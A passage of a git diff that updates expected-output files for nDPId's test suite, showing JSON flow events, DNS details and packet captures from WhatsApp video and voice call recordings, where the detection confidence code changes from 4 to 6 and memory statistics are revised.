-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1567,"packets-processed":1567,"total-skipped-flows":0,"total-l4-payload-len":891931,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":14,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1561455795283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1567/1567 @@ -88,9 +88,9 @@ ~~ total active/idle flows...: 14/14 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5991413 bytes -~~ total memory freed........: 5991413 bytes -~~ total allocations/frees...: 119744/119744 +~~ total memory allocated....: 6072388 bytes +~~ total memory freed........: 6072388 bytes +~~ total allocations/frees...: 122492/122492 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2365 chars diff --git a/test/results/wa_voice.pcap.out b/test/results/wa_voice.pcap.out index 8b8b9553b..d1f4d15f8 100644 --- a/test/results/wa_voice.pcap.out +++ b/test/results/wa_voice.pcap.out @@ -2,80 +2,80 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561455687942} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455687942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455687942,"pkt":"xiwDYGpkkLkxKPrKCABFAAA8VCwAAP8R4ibAqAIMwKgCAcjnADUAKL4MZG8BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687942,"flow_last_seen":1561455687942,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687942,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561455687944,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1561455687944,"pkt":"kLkxKPrKxiwDYGpkCABFAABMq4sAAEARSbjAqAIBwKgCDAA1yOcAOH0WZG+BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455687944,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455687991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455687991,"pkt":"xiwDYGpkkLkxKPrKCABFAAA89ksAAP8RQAfAqAIMwKgCAe1dADUAKOSmDHcBAAABAAAAAAAAAWcId2hhdHNhcHADbmV0AAABAAE="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455688018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1561455688018,"pkt":"kLkxKPrKxiwDYGpkCABFAABj38gAAEARFWTAqAIBwKgCDAA17V0ATz5mDHeBgAABAAIAAAAAAWcId2hhdHNhcHADbmV0AAABAAHADAAFAAEAAArzAAsEY2hhdANjZG7ADsAsAAEAAQAAAEEABJ3wFDU="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": 